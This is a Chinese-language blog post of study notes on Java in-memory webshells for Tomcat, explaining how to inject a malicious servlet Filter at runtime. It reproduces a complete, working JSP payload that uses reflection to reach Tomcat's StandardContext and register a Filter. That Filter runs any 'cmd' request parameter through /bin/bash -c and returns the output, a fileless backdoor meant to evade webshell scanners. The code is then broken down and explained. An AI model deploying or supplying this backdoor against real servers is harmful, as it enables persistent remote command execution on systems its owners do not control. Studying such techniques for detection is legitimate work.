Java内存shell:servlet

最近在学习Java内存shell相关知识,总结沉淀几篇文章,权当学习笔记了。

Java内存webshell史

直接引用c0ny1师傅的总结,写的太好了

1
2
3
4
5
6
7
8
9
10
11
12
其实内存马由来已久,早在17年n1nty师傅的《Tomcat源码调试笔记-看不见的shell》中已初见端倪,但一直不温不火。后经过rebeyong师傅使用agent技术加持后,拓展了内存马的使用场景,然终停留在奇技淫巧上。在各类hw洗礼之后,文件shell明显气数已尽。内存马以救命稻草的身份重回大众视野。特别是今年在shiro的回显研究之后,引发了无数安全研究员对内存webshell的研究,其中涌现出了LandGrey师傅构造的Spring controller内存马。至此内存马开枝散叶发展出了三大类型:

1. servlet-api类
	filter型
	servlet型
2. spring类
	拦截器
	controller型
3. Java Instrumentation类
	agent型

内存马这坛深巷佳酒,一时间流行于市井与弄堂之间。上至安全研究员下至普通客户,人尽皆知。正值hw来临之际,不难推测届时必将是内存马横行天下之日。而各大安全厂商却迟迟未见动静。所谓表面风平浪静,实则暗流涌动。或许一场内存马的围剿计划正慢慢展开。作为攻击方向的研究人员,没有对手就制造对手,攻防互换才能提升内存马技术的发展。

D盾、安全狗,以及各云厂商对于webshell识别技术愈发成熟,webshell生存空间一直被压缩,内存shell或许可以提供新的攻防方向。

n1nty师傅的jsp内存shell

n1nty师傅2017年的文章,见参考【1】,摘取其中重点逻辑代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
<%
final String name = "n1ntyfilter";

ServletContext ctx = request.getSession().getServletContext();
Field f = ctx.getClass().getDeclaredField("context");
f.setAccessible(true);
ApplicationContext appCtx = (ApplicationContext)f.get(ctx);

f = appCtx.getClass().getDeclaredField("context");
f.setAccessible(true);
StandardContext standardCtx = (StandardContext)f.get(appCtx);

f = standardCtx.getClass().getDeclaredField("filterConfigs");
f.setAccessible(true);
Map filterConfigs = (Map)f.get(standardCtx);

if (filterConfigs.get(name) == null) {
   out.println("inject "+ name);
   
   Filter filter = new Filter() {
      @Override
      public void init(FilterConfig arg0) throws ServletException {
         // TODO Auto-generated method stub
      }
      
      @Override
      public void doFilter(ServletRequest arg0, ServletResponse arg1, FilterChain arg2)
            throws IOException, ServletException {
         // TODO Auto-generated method stub
         HttpServletRequest req = (HttpServletRequest)arg0;
         if (req.getParameter("cmd") != null) {
            byte[] data = new byte[1024];
            Process p = new ProcessBuilder("/bin/bash","-c", req.getParameter("cmd")).start();
            int len = p.getInputStream().read(data);
            p.destroy();
            arg1.getWriter().write(new String(data, 0, len));
            return;
         } 
         arg2.doFilter(arg0, arg1);
      }
      
      @Override
      public void destroy() {
         // TODO Auto-generated method stub
      }
   };
   
   FilterDef filterDef = new FilterDef();
   filterDef.setFilterName(name);
   filterDef.setFilterClass(filter.getClass().getName());
   filterDef.setFilter(filter);
    
   standardCtx.addFilterDef(filterDef);
   
   FilterMap m = new FilterMap();
   m.setFilterName(filterDef.getFilterName());
   m.setDispatcher(DispatcherType.REQUEST.name());
   m.addURLPattern("/*");
   
   standardCtx.addFilterMapBefore(m);
   
   Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
   constructor.setAccessible(true);
   FilterConfig filterConfig = (FilterConfig)constructor.newInstance(standardCtx, filterDef);
   
   filterConfigs.put(name, filterConfig);
   out.println("injected");
}
%>

其中n1nty师傅是以jsp文件方式给出,jsp运行过程中会被编译成class,然后最终交由servlet处理

这个payload为servlet内存马的filter型的实现,下面解释其原理

Servlet 必备知识

Demo Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import javax.servlet.*;
import javax.servlet.http.*;
import java.io.IOException;
import java.io.PrintWriter;

public class ServletDemo2 extends HttpServlet {

    private String message;
    public void init() throws ServletException
    {
        // 执行必需的初始化
        message = "Hello World";
    }

    public void doGet(HttpServletRequest request,
                      HttpServletResponse response)
            throws ServletException, IOException
    {
        // 设置响应内容类型
        response.setContentType("text/html");

        // 实际的逻辑是在这里
        PrintWriter out = response.getWriter();
        out.println("<h1>" + message + "</h1>");
    }

    public void destroy()
    {
        // 什么也不做
    }
}

Filter

Filter是过滤器,正常是在web.xml,详情可以参考【4】中的过滤器一节,总结几个要点

  1. Servlet Filter过滤器可以动态地拦截请求和响应,以变换或使用包含在请求或响应中的信息。

  2. 配置中指定 /* ,可适用所有servlet

  3. web.xml 中的 filter-mapping 元素的顺序决定了 Web 容器应用过滤器到 Servlet 的顺序。若要反转过滤器的顺序,您只需要在 web.xml 文件中反转 filter-mapping 元素即可。

问题:除了静态配置web.xml,如何动态创建Filter?

调用链

正常的一个Servlet调用链

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:198)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:493)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:140)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:87)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:342)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:800)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:806)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1498)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:745)

Servlet内存shell

Filter型

恶意Filter

以下Filter针对每个请求,如果参数带cmd,则bash -c执行其参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Filter filter = new Filter() {
   @Override
   public void init(FilterConfig arg0) throws ServletException {
      // TODO Auto-generated method stub
   }
   
   @Override
   public void doFilter(ServletRequest arg0, ServletResponse arg1, FilterChain arg2)
         throws IOException, ServletException {
      // TODO Auto-generated method stub
      HttpServletRequest req = (HttpServletRequest)arg0;
      if (req.getParameter("cmd") != null) {
         byte[] data = new byte[1024];
         Process p = new ProcessBuilder("/bin/bash","-c", req.getParameter("cmd")).start();
         int len = p.getInputStream().read(data);
         p.destroy();
         arg1.getWriter().write(new String(data, 0, len));
         return;
      } 
      arg2.doFilter(arg0, arg1);
   }
   
   @Override
   public void destroy() {
      // TODO Auto-generated method stub
   }
};

加载Filter

n1nty师傅代码已经给出了加载Filter的方法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
// 组装 fiter 为FilterMap
         FilterDef filterDef = new FilterDef();
         filterDef.setFilterName(name);
         filterDef.setFilterClass(filter.getClass().getName());
         filterDef.setFilter(filter);
         FilterMap m = new FilterMap();
         m.setFilterName(filterDef.getFilterName());
         m.setDispatcher(DispatcherType.REQUEST.name());
         m.addURLPattern("/*");

// 获取 standardCtx
         ServletContext ctx = request.getSession().getServletContext();
         Field f = ctx.getClass().getDeclaredField("context");
         f.setAccessible(true);
         ApplicationContext appCtx = (ApplicationContext) f.get(ctx);

         f = appCtx.getClass().getDeclaredField("context");
         f.setAccessible(true);
         StandardContext standardCtx = (StandardContext) f.get(appCtx);

         f = standardCtx.getClass().getDeclaredField("filterConfigs");
         f.setAccessible(true);
         Map filterConfigs = (Map) f.get(standardCtx);
         
         
// 加载FilterMap
         standardCtx.addFilterDef(filterDef);
         standardCtx.addFilterMapBefore(m);

         Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
         constructor.setAccessible(true);
         FilterConfig filterConfig = (FilterConfig) constructor.newInstance(standardCtx, filterDef);

         filterConfigs.put(name, filterConfig);

但是又是如何定位到的呢?

** step1: 官方ServletContext自带的addFilter 接口 **

类org.apache.catalina.core.ApplicationContextFacade#addFilter接口

调用org.apache.catalina.core.ApplicationContext#addFilter接口

但是不行,存在限制,容器启动之后无法调用

** step2 手动实现addFilter接口 **

调试最终定位到

org.apache.catalina.core.ApplicationFilterFactory#createFilterChain

排序Filter

threedr3am师傅有在参考【6】中提及,tomcat回显时涉及到Filter排序的问题

internalDoFilter默认会执行所有的Filter,然后再进入doGet/doPost流程

Shiro是自定义的Filter,所以不能通过通过这种方式取到response回显。

(shiro的大概逻辑明白了,有空调试下)

前文有提到web.xml中Filter的排序执行问题,对于只是tomcat内存shell的话,几乎无影响

threedr3am师傅的TomcatShell有默认把evil Filter放在首位

Servlet型

待补充

小结

思考问题

  1. n1nty师傅还提到 “动态插入 Valve” 的方式,如何实现?

  2. php作为最火的语言,可以实现无文件webshell吗?

  3. 如上,python框架,flask/django,uwsgi呢?

参考

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true